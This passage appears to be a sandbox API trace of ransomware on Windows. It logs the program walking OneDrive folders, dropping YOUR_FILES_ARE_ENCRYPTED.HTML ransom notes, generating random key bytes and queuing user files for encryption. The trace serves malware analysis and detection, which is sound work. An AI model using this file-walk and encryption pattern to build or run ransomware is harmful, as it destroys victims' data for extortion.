ftLastAccessTime.dwLowDateTime=0x5d3dd471, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d3dd471, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="zu-za", cAlternateFileName="")) returned 0 [0114.101] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.101] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0114.101] GetProcessHeap () returned 0x600000 [0114.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.102] WriteFile (in: hFile=0x31c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.103] CloseHandle (hObject=0x31c) returned 1 [0114.103] GetProcessHeap () returned 0x600000 [0114.103] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.104] GetProcessHeap () returned 0x600000 [0114.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.104] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="logs", cAlternateFileName="")) returned 1 [0114.104] StrStrIW (lpFirst="logs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.104] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs") returned 63 [0114.104] GetProcessHeap () returned 0x600000 [0114.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.105] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs" [0114.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\*" [0114.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.105] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0114.105] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="Personal", cAlternateFileName="")) returned 1 [0114.105] StrStrIW (lpFirst="Personal", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.105] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal") returned 72 [0114.105] GetProcessHeap () returned 0x600000 [0114.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.106] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal" [0114.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\*" [0114.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.106] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.107] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c44d76, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="TraceCurrent.5892.0626.etl", cAlternateFileName="TRACEC~1.ETL")) returned 1 [0114.107] StrStrIW (lpFirst="TraceCurrent.5892.0626.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.107] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\TraceCurrent.5892.0626.etl") returned 99 [0114.107] PathFindExtensionW (pszPath="TraceCurrent.5892.0626.etl") returned=".etl" [0114.107] lstrlenW (lpString=".etl") returned 4 [0114.107] PathFindExtensionW (pszPath="TraceCurrent.5892.0626.etl") returned=".etl" [0114.107] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c44d76, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="TraceCurrent.5892.0626.etl", cAlternateFileName="TRACEC~1.ETL")) returned 0 [0114.107] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.107] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0114.107] GetProcessHeap () returned 0x600000 [0114.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\logs\\personal\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.108] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.109] CloseHandle (hObject=0x324) returned 1 [0114.109] GetProcessHeap () returned 0x600000 [0114.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.109] GetProcessHeap () returned 0x600000 [0114.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.110] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c1ec39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="Personal", cAlternateFileName="")) returned 0 [0114.110] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.110] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0114.110] GetProcessHeap () returned 0x600000 [0114.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.111] WriteFile (in: hFile=0x31c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.112] CloseHandle (hObject=0x31c) returned 1 [0114.112] GetProcessHeap () returned 0x600000 [0114.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.112] GetProcessHeap () returned 0x600000 [0114.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.113] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e2ad9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x849e2ad9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x12862516, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x5d4c0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0114.113] StrStrIW (lpFirst="OneDrive.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.113] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe") returned 71 [0114.113] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0114.113] lstrlenW (lpString=".exe") returned 4 [0114.113] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0114.113] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b49234, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b49234, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="setup", cAlternateFileName="")) returned 1 [0114.113] StrStrIW (lpFirst="setup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.113] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned 64 [0114.113] GetProcessHeap () returned 0x600000 [0114.113] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.114] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup" [0114.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*" [0114.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b49234, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b49234, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.114] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b49234, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b49234, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0114.114] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6630871f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6630871f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="logs", cAlternateFileName="")) returned 1 [0114.114] StrStrIW (lpFirst="logs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.114] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned 69 [0114.114] GetProcessHeap () returned 0x600000 [0114.114] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.115] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" [0114.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*" [0114.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6630871f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6630871f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.117] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6630871f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6630871f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.117] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6630871f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x6630871f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66bb717b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x215e, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="2021-02-18_130550_474-cac.log", cAlternateFileName="2021-0~2.LOG")) returned 1 [0114.117] StrStrIW (lpFirst="2021-02-18_130550_474-cac.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.117] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log") returned 99 [0114.117] PathFindExtensionW (pszPath="2021-02-18_130550_474-cac.log") returned=".log" [0114.117] lstrlenW (lpString=".log") returned 4 [0114.117] PathFindExtensionW (pszPath="2021-02-18_130550_474-cac.log") returned=".log" [0114.117] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-18_130550_474-cac.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0114.118] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8542) returned 1 [0114.118] GetProcessHeap () returned 0x600000 [0114.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0114.121] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="EF") returned 2 [0114.121] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="D5") returned 2 [0114.121] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="66") returned 2 [0114.121] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="9D") returned 2 [0114.121] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="5E") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="25") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="4F") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="36") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="1B") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="3A") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="A8") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="3A") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="39") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="84") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="92") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="89") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="B0") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="56") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="C4") returned 2 [0114.121] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="AA") returned 2 [0114.121] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="06") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="5D") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A8") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="B7") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="0F") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="30") returned 2 [0114.121] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="F8") returned 2 [0114.121] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="DC") returned 2 [0114.122] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="CF") returned 2 [0114.122] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="A9") returned 2 [0114.122] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F5") returned 2 [0114.122] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="22") returned 2 [0114.122] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log" [0114.122] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.122] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0114.122] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65f2e5a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x65f2e5a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f8974f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x640128, dwReserved1=0x385835e, 